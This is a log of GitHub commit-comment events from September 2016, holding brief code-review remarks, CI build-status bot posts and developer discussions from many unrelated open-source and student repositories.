{"id":"4553565568","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18996327,"position":null,"line":null,"path":null,"commit_id":"ca36a1c6d774805297aa60a82dcfd30166f30687","created_at":"2016-09-13T05:42:40Z","updated_at":"2016-09-13T05:42:40Z","body":"This patch modifies the include source path to the source file of Ryu.\r\nAnd modifies the hard-code sources to include the source file of Ryu."}},"created_at":"2016-09-13T05:42:40Z"}
{"id":"4553565727","type":"CommitCommentEvent","actor":{"login":"sotetsuk"},"repo":{"name":"sotetsuk/algo-rl-ja"},"payload":{"comment":{"id":18996328,"position":12,"line":10,"path":"tex/400_control.tex","commit_id":"21695684f9b4a3fd21dc1a1b565d314bea4d998d","created_at":"2016-09-13T05:42:45Z","updated_at":"2016-09-13T05:42:45Z","body":"点が多い"}},"created_at":"2016-09-13T05:42:45Z"}
{"id":"4553568431","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18996335,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T05:43:49Z","updated_at":"2016-09-13T05:43:49Z","body":"Some of the bads:\r\n1. Ref #1482. People have various ideas on such an important api, but you commited it without proper discussion and investigation;\r\n2. Forge itself is maintained only by a small amount of people, such an important api may change often and the way of management over this api is not very appropriate;\r\n3. Different mods have different energies in different means. If you try to unify the electricity of Industral-Craft 2 and the mana of Botania, that really sound suck a lot."}},"created_at":"2016-09-13T05:43:49Z"}
{"id":"4553569276","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRoms/frameworks_base"},"payload":{"comment":{"id":18996338,"position":null,"line":null,"path":null,"commit_id":"925fb6669fd3375258dcd452b212f8629d70fcde","created_at":"2016-09-13T05:44:10Z","updated_at":"2016-09-13T05:44:10Z","body":"Works with both."}},"created_at":"2016-09-13T05:44:10Z"}
{"id":"4553570798","type":"CommitCommentEvent","actor":{"login":"techtonik"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18996342,"position":null,"line":null,"path":null,"commit_id":"87b126d6c9887bb05f0164953f1eb89a4888c56e","created_at":"2016-09-13T05:44:47Z","updated_at":"2016-09-13T05:44:47Z","body":"No BSoD so far and no `minidump` was generated, so I guess it is fine for now."}},"created_at":"2016-09-13T05:44:47Z"}
{"id":"4553575394","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18996349,"position":null,"line":null,"path":null,"commit_id":"00207d817783db33963727193f7cddf13212a2ad","created_at":"2016-09-13T05:46:30Z","updated_at":"2016-09-13T05:46:30Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00207d817783db33963727193f7cddf13212a2ad-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00207d817783db33963727193f7cddf13212a2ad-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T05:46:30Z"}
{"id":"4553576503","type":"CommitCommentEvent","actor":{"login":"pleb"},"repo":{"name":"damoclark/buzzer.click"},"payload":{"comment":{"id":18996351,"position":10,"line":10,"path":"www/js/controller.js","commit_id":"9b160720db59399ff5fa14cafc2c53dc746e5fa8","created_at":"2016-09-13T05:46:56Z","updated_at":"2016-09-13T05:46:56Z","body":"@nick2170 see https://jsfiddle.net/n5y8pgow/3/"}},"created_at":"2016-09-13T05:46:56Z"}
{"id":"4553577254","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18996352,"position":null,"line":null,"path":null,"commit_id":"07f36081a6cceb66cbfc74c01b5e4be79c4fbc73","created_at":"2016-09-13T05:47:14Z","updated_at":"2016-09-13T05:47:14Z","body":"```\r\nThis patch adds the command to get mininet environment script from github.\r\n```\r\nに修正します。また、タイトルもprocessからcommandに修正します"}},"created_at":"2016-09-13T05:47:14Z"}
{"id":"4553577304","type":"CommitCommentEvent","actor":{"login":"blackearth2014"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":18996353,"position":null,"line":null,"path":null,"commit_id":"b65a231770797d89824be2d66c337a31fb8e5b42","created_at":"2016-09-13T05:47:15Z","updated_at":"2016-09-13T05:47:15Z","body":"Thanks for  adding the color space selection options. Would the keyer node get the same options or is there no need?"}},"created_at":"2016-09-13T05:47:15Z"}
{"id":"4553578958","type":"CommitCommentEvent","actor":{"login":"sgiehl"},"repo":{"name":"sgiehl/piwik-plugin-ReferrersManager"},"payload":{"comment":{"id":18996355,"position":5,"line":9,"path":"plugin.json","commit_id":"9d8093d3da9bb6e553f870954eb52628508e59dd","created_at":"2016-09-13T05:47:53Z","updated_at":"2016-09-13T05:47:53Z","body":"thx. I'll change that with the next release"}},"created_at":"2016-09-13T05:47:53Z"}
{"id":"4553579752","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"YoshinoriSaito/ysaitoprogram"},"payload":{"comment":{"id":18996358,"position":9,"line":9,"path":"160913insrt.php","commit_id":"424a2cf94d72dbcdac459d148b1b918894b3d670","created_at":"2016-09-13T05:48:12Z","updated_at":"2016-09-13T05:48:12Z","body":"プログラム全体をロボットのようにみたてると、\r\nPDOは他の人が作ったパーツ(装備品)だと思ってください。\r\n * パーツは他の人が作ったものを使うこともできますし、自分で作って使うこともできます。\r\n```\r\nnew PDO()\r\n```\r\nの部分ですが、他の人が作ったパーツを起動するための記述です。\r\n起動するとパーツが備えている様々な技が使えます(ミサイルを搭載しているパーツなら、「ミサイルを発射」できるイメージ)。\r\n技は `->` で呼び出すことができます。\r\n以下の部分が`prepare`という技を使っているところです。\r\n```\r\n$dbh->prepare();\r\n```\r\n\r\nこのようにプログラムは色々なパーツ(他の人が作ったものや、自分が作ったもの)を組み併せて使うものだということを念頭に置いていただければと思います。\r\n\r\n上記説明に関して詳しく(&正確に)は「PHP クラス」を学ぶと理解できるかと思います。ただ学ぶには時間を要するものですので、まずは上記のイメージを持っていただれば良いかと思っております。"}},"created_at":"2016-09-13T05:48:12Z"}
{"id":"4553580118","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/renjin"},"payload":{"comment":{"id":18996359,"position":22,"line":99,"path":"core/src/main/java/org/renjin/stats/internals/distributions/RNG.java","commit_id":"b38f54e841499c7f5b88408e02b17bbc1c17bf77","created_at":"2016-09-13T05:48:20Z","updated_at":"2016-09-13T05:48:20Z","body":"This will still throw an error if any of the parameters has zero length"}},"created_at":"2016-09-13T05:48:20Z"}
{"id":"4553582197","type":"CommitCommentEvent","actor":{"login":"philipbelesky"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18996365,"position":22,"line":29,"path":"tabbycat/draw/templates/admin/draw/debate/change_form.html","commit_id":"5a22d986f01f241e063216b9bd93ab4f20a11d1f","created_at":"2016-09-13T05:49:12Z","updated_at":"2016-09-13T05:49:12Z","body":"Yea, I realise it wouldn't load when the page is loaded with that hash set, I just assume that it would basically never happen. \r\n\r\nAs for the hooks I'm not sure at the level of actual implementation, but its common to have lots of different js functions hooked up to the same events and DOM elements. "}},"created_at":"2016-09-13T05:49:12Z"}
{"id":"4553583007","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"AlmuraDev/Almura"},"payload":{"comment":{"id":18996367,"position":12,"line":512,"path":"src/main/java/com/almuradev/almura/CommonProxy.java","commit_id":"7f126fff893306c0b1e86e066a364b8dc910c2e4","created_at":"2016-09-13T05:49:30Z","updated_at":"2016-09-13T05:49:30Z","body":"@liach \r\n\r\nWhy does it matter who this is? Its frankly none of your business."}},"created_at":"2016-09-13T05:49:30Z"}
{"id":"4553583955","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18996369,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T05:49:51Z","updated_at":"2016-09-13T05:49:51Z","body":"https://github.com/MinecraftForge/MinecraftForge/issues/1482#issuecomment-61037277\r\nWhy don't you consider about those this time lex?"}},"created_at":"2016-09-13T05:49:51Z"}
{"id":"4553584808","type":"CommitCommentEvent","actor":{"login":"DarkGuardsman"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18996370,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T05:50:12Z","updated_at":"2016-09-13T05:50:12Z","body":"@liach\r\n1) Lex did comment on that post and I've seen him talk to people about this before.\r\n2) Anyone can help out on Forge\r\n3) Lex did a good job on this, he add the minimal needed for any system to function. As well its a 100% option as most mods will still use their own system. I myself still plan to use my UE power system internally and this externally. That being said my power system already works the way forge implement theirs. "}},"created_at":"2016-09-13T05:50:12Z"}
{"id":"4553586313","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"AlmuraDev/Almura"},"payload":{"comment":{"id":18996374,"position":12,"line":512,"path":"src/main/java/com/almuradev/almura/CommonProxy.java","commit_id":"7f126fff893306c0b1e86e066a364b8dc910c2e4","created_at":"2016-09-13T05:50:47Z","updated_at":"2016-09-13T05:50:47Z","body":"Okay. I just wonders who is playing around on Almura. Will not ask anymore."}},"created_at":"2016-09-13T05:50:47Z"}
{"id":"4553589518","type":"CommitCommentEvent","actor":{"login":"toji"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18996376,"position":null,"line":null,"path":null,"commit_id":"f8d15c6cf63eb54cbe692dc38635784f18bc0675","created_at":"2016-09-13T05:52:03Z","updated_at":"2016-09-13T05:52:03Z","body":"Follow up to 1328cc7af2049aa0ce116755ce8a4f7cc51582a4, primarily to mirror the same interface in the fullscreen API. (Also helps with testing.)"}},"created_at":"2016-09-13T05:52:03Z"}
{"id":"4553592570","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18996386,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T05:53:13Z","updated_at":"2016-09-13T05:53:13Z","body":"Okay modders may, on their own, to start an activity to reject this capability system or whatsoever. :crying_cat_face: "}},"created_at":"2016-09-13T05:53:13Z"}
{"id":"4553594172","type":"CommitCommentEvent","actor":{"login":"Charizard"},"repo":{"name":"germ-io/trello-power-up"},"payload":{"comment":{"id":18996388,"position":null,"line":null,"path":null,"commit_id":"0a51d08efcb03b53999b6988918a3dbc6a58d61d","created_at":"2016-09-13T05:53:51Z","updated_at":"2016-09-13T05:53:51Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5LnOhJuD&#x2F;9-use-color-coded-labels-for-organization\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Use color-coded labels for organization</a>"}},"created_at":"2016-09-13T05:53:51Z"}
{"id":"4553595024","type":"CommitCommentEvent","actor":{"login":"Kamilius"},"repo":{"name":"VictoriiaKlubchuk/JS-module-11-12"},"payload":{"comment":{"id":18996391,"position":14,"line":14,"path":"js/script.js","commit_id":"852ad2fa4293ce3109c4ad35248dc4c777266472","created_at":"2016-09-13T05:54:11Z","updated_at":"2016-09-13T05:54:11Z","body":"Усе дуже добре, та знову є проблема з форматуванням коду. "}},"created_at":"2016-09-13T05:54:11Z"}
{"id":"4553599614","type":"CommitCommentEvent","actor":{"login":"jtsymon"},"repo":{"name":"Arcton/arcton.github.io"},"payload":{"comment":{"id":18996398,"position":6,"line":5,"path":"_competitions/govhack-15.html","commit_id":"d7c75c029053c448d219ae349951ed83732f6734","created_at":"2016-09-13T05:55:52Z","updated_at":"2016-09-13T05:55:52Z","body":"Used for sorting the events in the menu. Uses a date rather than an arbitrary number to make it human-readable. Does a simple string-based sort, so you can partially specify however much of is required (e.g. year, year-month, year-month-day, or an arbitrary value for ongoing stuff such as e-sports).\r\nI would have used `date`, but this causes Jekyll to parse it as a date, which fails because it isn't a complete date.\r\nI would also have used dashes to separate the year/month, but this causes Jekyll to fail to parse, so I used a period."}},"created_at":"2016-09-13T05:55:52Z"}
{"id":"4553600082","type":"CommitCommentEvent","actor":{"login":"polkovnikov-ph"},"repo":{"name":"google/closure-compiler-js"},"payload":{"comment":{"id":18996400,"position":null,"line":null,"path":null,"commit_id":"a557c78186f0aeb2e6600854f0a3c919fd1417f0","created_at":"2016-09-13T05:56:03Z","updated_at":"2016-09-13T05:56:03Z","body":"@MatrixFrog Well, when there is a bug in \"Hello, World\" example in `README` that makes an example crash, it's a good time to push a new version to npm (probably using a cherrypick for this commit to avoid problems with unstable features). Whoever is releaser of the project, should be very concerned with such issues."}},"created_at":"2016-09-13T05:56:03Z"}
{"id":"4553600404","type":"CommitCommentEvent","actor":{"login":"brockuniera"},"repo":{"name":"brockuniera/llgo"},"payload":{"comment":{"id":18996402,"position":4,"line":39,"path":"irgen/targets.go","commit_id":"ef7dafa33f6d350db51c246a0cefe32b02bef535","created_at":"2016-09-13T05:56:12Z","updated_at":"2016-09-13T05:56:12Z","body":"This change causes a compile time error. TargetData() isn't a defined method on TargetMachine structs. TargetMachine is defined [here](http://llvm.org/svn/llvm-project/llvm/trunk/bindings/go/llvm/target.go)"}},"created_at":"2016-09-13T05:56:12Z"}
{"id":"4553602496","type":"CommitCommentEvent","actor":{"login":"bdharrington7"},"repo":{"name":"NodeBB/NodeBB"},"payload":{"comment":{"id":18996408,"position":null,"line":null,"path":null,"commit_id":"c1e361377938149d0d10b55b618aa20f40cb4904","created_at":"2016-09-13T05:56:58Z","updated_at":"2016-09-13T05:56:58Z","body":"@julianlam how feasible would it be to upgrade this to the latest? v1.7.2 was just released and it fixes a critical issue where autocomplete could crash if being called in quick succession (in my testing)\r\n\r\nhttps://github.com/yuku-t/jquery-textcomplete/pull/261"}},"created_at":"2016-09-13T05:56:58Z"}
{"id":"4553602752","type":"CommitCommentEvent","actor":{"login":"peterwang1996"},"repo":{"name":"xmjmsc/study1"},"payload":{"comment":{"id":18996409,"position":null,"line":null,"path":null,"commit_id":"bd34eb2b35f2818b3838096195815978e04e0a4b","created_at":"2016-09-13T05:57:05Z","updated_at":"2016-09-13T05:57:05Z","body":"话说你去下载 GitHub 的客户端来管理你的仓库啊……\r\n还有，我没教过用 QQ 截图切图啊……好好去学 PS 切图，第一周任务的参考资料里有教程。"}},"created_at":"2016-09-13T05:57:05Z"}
{"id":"4553603527","type":"CommitCommentEvent","actor":{"login":"flin-zap"},"repo":{"name":"ZapTechnology/teamcity-theatre"},"payload":{"comment":{"id":18996410,"position":null,"line":null,"path":null,"commit_id":"d57a8bcbd3cd6667d447cc6f3cf35d17572594e0","created_at":"2016-09-13T05:57:22Z","updated_at":"2016-09-13T05:57:22Z","body":"Show build as successful only if the last finished build is (as opposed to if the currently running build hasn't failed yet)\r\n\r\nDon't barf if a build configuration can't be found in Teamcity"}},"created_at":"2016-09-13T05:57:22Z"}
{"id":"4553611092","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18996417,"position":null,"line":null,"path":null,"commit_id":"c40b2d1724901fa00b2b10edf28b2939acbff302","created_at":"2016-09-13T05:59:59Z","updated_at":"2016-09-13T05:59:59Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c40b2d1724901fa00b2b10edf28b2939acbff302-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c40b2d1724901fa00b2b10edf28b2939acbff302-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T05:59:59Z"}
{"id":"4553619389","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-core"},"payload":{"comment":{"id":18996468,"position":null,"line":null,"path":null,"commit_id":"4268b44abde41948a4c8b92b358505fcff0cc9a9","created_at":"2016-09-13T06:02:40Z","updated_at":"2016-09-13T06:02:40Z","body":"@preethi29 yes it is not available. It is going to be in the 2.0.1 maintenance release, which we are going to release after fixing those obs saving related issues that you raised on talk. Would this work for you?"}},"created_at":"2016-09-13T06:02:40Z"}
{"id":"4553619667","type":"CommitCommentEvent","actor":{"login":"jbkempf"},"repo":{"name":"videolan/vlc"},"payload":{"comment":{"id":18996471,"position":null,"line":null,"path":null,"commit_id":"c220ddc927d1a97f72a0c5bf86de56301e3483ad","created_at":"2016-09-13T06:02:47Z","updated_at":"2016-09-13T06:02:47Z","body":"It is a security issue, so I doubt it's a good idea to change this."}},"created_at":"2016-09-13T06:02:47Z"}
{"id":"4553622287","type":"CommitCommentEvent","actor":{"login":"Nikolas83"},"repo":{"name":"nikolay-gavrilov/lemon-school"},"payload":{"comment":{"id":18996479,"position":70,"line":70,"path":"6/css/main.css","commit_id":"addd76519b35b3c36190461f31ae71cfd1e20c01","created_at":"2016-09-13T06:03:46Z","updated_at":"2016-09-13T06:03:46Z","body":"Исправлюсь! Спасибо)"}},"created_at":"2016-09-13T06:03:46Z"}
{"id":"4553625316","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18996485,"position":null,"line":null,"path":null,"commit_id":"d0f11f23d8ea40499f4e37971ae4ac545bb91c0f","created_at":"2016-09-13T06:04:41Z","updated_at":"2016-09-13T06:04:41Z","body":"Related to: backdrop/backdrop-issues#1361 "}},"created_at":"2016-09-13T06:04:41Z"}
{"id":"4553626531","type":"CommitCommentEvent","actor":{"login":"Nikolas83"},"repo":{"name":"nikolay-gavrilov/lemon-school"},"payload":{"comment":{"id":18996487,"position":5,"line":5,"path":"6/index.html","commit_id":"addd76519b35b3c36190461f31ae71cfd1e20c01","created_at":"2016-09-13T06:05:07Z","updated_at":"2016-09-13T06:05:07Z","body":"Да это какая-то фича на саблайме стояла при развороте эметом. Не мог на"}},"created_at":"2016-09-13T06:05:07Z"}
{"id":"4553629261","type":"CommitCommentEvent","actor":{"login":"MrCsabaToth"},"repo":{"name":"gdgfresno/valleydevfest"},"payload":{"comment":{"id":18996492,"position":null,"line":null,"path":null,"commit_id":"6db3b78e8b77896c5ed6925f0df68f563055d4ed","created_at":"2016-09-13T06:06:04Z","updated_at":"2016-09-13T06:06:04Z","body":"Fixes #11"}},"created_at":"2016-09-13T06:06:04Z"}
{"id":"4553630314","type":"CommitCommentEvent","actor":{"login":"rohitagg0807"},"repo":{"name":"rohitagg0807/Perfect"},"payload":{"comment":{"id":18996495,"position":null,"line":null,"path":null,"commit_id":"ff494666ee288a3cb52402e8b83c7b2a43f4794d","created_at":"2016-09-13T06:06:24Z","updated_at":"2016-09-13T06:06:24Z","body":"#3 "}},"created_at":"2016-09-13T06:06:24Z"}
{"id":"4553630470","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18996496,"position":null,"line":null,"path":null,"commit_id":"510bb28f0a7b4830a50bdf919b3c5796110464a5","created_at":"2016-09-13T06:06:28Z","updated_at":"2016-09-13T06:06:28Z","body":"NuSOAP is not maintained by anyone anymore. That's true.\r\nOfaj needed ASAP! :p"}},"created_at":"2016-09-13T06:06:28Z"}
{"id":"4553630844","type":"CommitCommentEvent","actor":{"login":"pkleczek"},"repo":{"name":"durda1996/Thumeleaf"},"payload":{"comment":{"id":18996497,"position":9,"line":9,"path":"src/main/java/com/Dima/WebApplication.java","commit_id":"a8e2cf336abf80a664f3f2a4edaf229dfbe49467","created_at":"2016-09-13T06:06:35Z","updated_at":"2016-09-13T06:06:35Z","body":"You should put WebApplication.class here"}},"created_at":"2016-09-13T06:06:35Z"}
{"id":"4553630915","type":"CommitCommentEvent","actor":{"login":"jimmidyson"},"repo":{"name":"fabric8io/gofabric8"},"payload":{"comment":{"id":18996498,"position":83,"line":0,"path":"cmds/install.go","commit_id":"21c75937f024e615884973bbc2bdac7dee8d5897","created_at":"2016-09-13T06:06:37Z","updated_at":"2016-09-13T06:06:37Z","body":"Doesn't sudo require entering a password? Does this prompt properly?"}},"created_at":"2016-09-13T06:06:37Z"}
{"id":"4553635400","type":"CommitCommentEvent","actor":{"login":"shal4skull"},"repo":{"name":"shal4skull/assignment-3"},"payload":{"comment":{"id":18996509,"position":null,"line":null,"path":null,"commit_id":"ae2aef10087b581859262698a2f085965232d400","created_at":"2016-09-13T06:08:13Z","updated_at":"2016-09-13T06:08:13Z","body":"sample"}},"created_at":"2016-09-13T06:08:13Z"}
{"id":"4553635912","type":"CommitCommentEvent","actor":{"login":"chelmuth"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":18996510,"position":24,"line":35,"path":"repos/os/include/input_session/connection.h","commit_id":"136e4193f9b49bc5f141f7791f7ad419d4235f87","created_at":"2016-09-13T06:08:25Z","updated_at":"2016-09-13T06:08:25Z","body":"I know that other connection types also use `char const *` but shouldn't we go for Session_label here?"}},"created_at":"2016-09-13T06:08:25Z"}
{"id":"4553639677","type":"CommitCommentEvent","actor":{"login":"kpettinga"},"repo":{"name":"ObjectiveSubject/cgu"},"payload":{"comment":{"id":18996515,"position":null,"line":null,"path":null,"commit_id":"3ad8e8bb858a1ce2504ba9dd56af1f266e02e952","created_at":"2016-09-13T06:09:44Z","updated_at":"2016-09-13T06:09:44Z","body":"#88 "}},"created_at":"2016-09-13T06:09:44Z"}
{"id":"4553640025","type":"CommitCommentEvent","actor":{"login":"kpettinga"},"repo":{"name":"ObjectiveSubject/cgu"},"payload":{"comment":{"id":18996517,"position":null,"line":null,"path":null,"commit_id":"87fcc49830b9d83e972f55b19dc60aaefab55e23","created_at":"2016-09-13T06:09:52Z","updated_at":"2016-09-13T06:09:52Z","body":"#88 "}},"created_at":"2016-09-13T06:09:52Z"}
{"id":"4553640494","type":"CommitCommentEvent","actor":{"login":"ratoaq2"},"repo":{"name":"guessit-io/guessit"},"payload":{"comment":{"id":18996519,"position":97,"line":1960,"path":"guessit/test/episodes.yml","commit_id":"7636ed3bd0f6cfa21b4676aab87f0a6d4841c4a1","created_at":"2016-09-13T06:10:02Z","updated_at":"2016-09-13T06:10:02Z","body":"Yes. This is clearly a season range from 1 to 10"}},"created_at":"2016-09-13T06:10:02Z"}
{"id":"4553641410","type":"CommitCommentEvent","actor":{"login":"ElvenMetellus"},"repo":{"name":"OGMP-Gyrth/OGMods"},"payload":{"comment":{"id":18996521,"position":null,"line":null,"path":null,"commit_id":"ce72dabdf6d82b435d503e9fd958a6a9b4292196","created_at":"2016-09-13T06:10:21Z","updated_at":"2016-09-13T06:10:21Z","body":"hey how are u Boss im a big fan of ur work really amazing :) can u help me for my mod just need a small help im doing a MK mod http://www.moddb.com/mods/mortal-kombat-neverage i just need help for super powers like fire ball and ice ball that it if u can help and btw do u have that map? Overgrowth - American City (Markuss) https://www.youtube.com/results?search_query=overgrowth+city+ i keep trying to download asking for cD key for some reason i don't got mine plz if u do send it to my email it would be so nice elvenmetellus@gmail.com "}},"created_at":"2016-09-13T06:10:21Z"}
{"id":"4553647294","type":"CommitCommentEvent","actor":{"login":"Nikolas83"},"repo":{"name":"nikolay-gavrilov/lemon-school"},"payload":{"comment":{"id":18996529,"position":17,"line":17,"path":"6/index.html","commit_id":"addd76519b35b3c36190461f31ae71cfd1e20c01","created_at":"2016-09-13T06:12:23Z","updated_at":"2016-09-13T06:12:23Z","body":"7\\img\\favicon ) Или я намудрил? Это называется куча свободного времени))"}},"created_at":"2016-09-13T06:12:23Z"}
{"id":"4553647351","type":"CommitCommentEvent","actor":{"login":"Kamilius"},"repo":{"name":"VictoriiaKlubchuk/JS-module-17-18"},"payload":{"comment":{"id":18996531,"position":1,"line":1,"path":".gitignore","commit_id":"75647cf969536684924d07c3509cb3abe01af256","created_at":"2016-09-13T06:12:24Z","updated_at":"2016-09-13T06:12:24Z","body":"В цьому файлі немає папки `dist/`. Оскільки вона буде повністю скаладатись зі зегенрованих файлів, її також потрібно ігнорити"}},"created_at":"2016-09-13T06:12:24Z"}
{"id":"4553650188","type":"CommitCommentEvent","actor":{"login":"shal4skull"},"repo":{"name":"shal4skull/assignment-3"},"payload":{"comment":{"id":18996534,"position":null,"line":null,"path":null,"commit_id":"ae2aef10087b581859262698a2f085965232d400","created_at":"2016-09-13T06:13:21Z","updated_at":"2016-09-13T06:13:21Z","body":"Added missing classes"}},"created_at":"2016-09-13T06:13:21Z"}
{"id":"4553650261","type":"CommitCommentEvent","actor":{"login":"xiongtx"},"repo":{"name":"emacs-helm/helm"},"payload":{"comment":{"id":18996535,"position":8,"line":243,"path":"helm-org.el","commit_id":"7fcf4f8b62fb7cd136f3eb08b6316a8f022a6031","created_at":"2016-09-13T06:13:23Z","updated_at":"2016-09-13T06:13:23Z","body":"You can try `outline-previous-visible-heading` and `outline-next-visible-heading`, which are what the older versions of Org-mode use.\r\n\r\nIt's also possible to copy the `org-` functions into Helm itself."}},"created_at":"2016-09-13T06:13:23Z"}
{"id":"4553651479","type":"CommitCommentEvent","actor":{"login":"enjoy-digital"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":18996537,"position":null,"line":null,"path":null,"commit_id":"ccf3c1e1b0577acbf24f04699c9019b4a0252efb","created_at":"2016-09-13T06:13:49Z","updated_at":"2016-09-13T06:13:49Z","body":"Thanks, using disp_inter instead of disp_in fixes it.\r\n\r\nK28.7 is used on JESD204 for frame alignment: \r\nhttps://github.com/enjoy-digital/litejesd204b/blob/master/litejesd204b/common.py#L61"}},"created_at":"2016-09-13T06:13:49Z"}
{"id":"4553656905","type":"CommitCommentEvent","actor":{"login":"devenbansod"},"repo":{"name":"mgupta1410/mgupta1410.github.io"},"payload":{"comment":{"id":18996555,"position":10,"line":179,"path":"speechanalysis.html","commit_id":"c0afbcb2b785d92d5880f0c4c485ed39c1410f78","created_at":"2016-09-13T06:15:43Z","updated_at":"2016-09-13T06:15:43Z","body":"This produces a 404 as it thinks it's a github page:\r\nhttp://mgupta1410.github.io//www.narendramodi.in/category/text-speeches\r\n\r\nI think you should add `https://` in href. "}},"created_at":"2016-09-13T06:15:43Z"}
{"id":"4553659747","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18996558,"position":null,"line":null,"path":null,"commit_id":"250df8f6857fbab72b52dd72c041957e310433f7","created_at":"2016-09-13T06:16:45Z","updated_at":"2016-09-13T06:16:45Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2307 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-250df8f6857fbab72b52dd72c041957e310433f7-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-250df8f6857fbab72b52dd72c041957e310433f7-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.55%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T06:16:45Z"}
{"id":"4553659947","type":"CommitCommentEvent","actor":{"login":"chelmuth"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":18996559,"position":null,"line":null,"path":null,"commit_id":"136e4193f9b49bc5f141f7791f7ad419d4235f87","created_at":"2016-09-13T06:16:49Z","updated_at":"2016-09-13T06:16:49Z","body":"I like the patch and vote for merge. @nfeske do you object with the `Attached_dataspace` in `Input::Session_client`?"}},"created_at":"2016-09-13T06:16:49Z"}
{"id":"4553665627","type":"CommitCommentEvent","actor":{"login":"mars0122"},"repo":{"name":"mars0122/JavaTech"},"payload":{"comment":{"id":18996568,"position":null,"line":null,"path":null,"commit_id":"cc77c58a9b59cb545ea47b660a7cdfcf03a57242","created_at":"2016-09-13T06:18:45Z","updated_at":"2016-09-13T06:18:45Z","body":"Just base point for Java, just for note step by step."}},"created_at":"2016-09-13T06:18:45Z"}
{"id":"4553680022","type":"CommitCommentEvent","actor":{"login":"Nikolas83"},"repo":{"name":"nikolay-gavrilov/lemon-school"},"payload":{"comment":{"id":18996585,"position":55,"line":55,"path":"7/css/main.css","commit_id":"addd76519b35b3c36190461f31ae71cfd1e20c01","created_at":"2016-09-13T06:23:25Z","updated_at":"2016-09-13T06:23:25Z","body":"Вот лопух)"}},"created_at":"2016-09-13T06:23:25Z"}
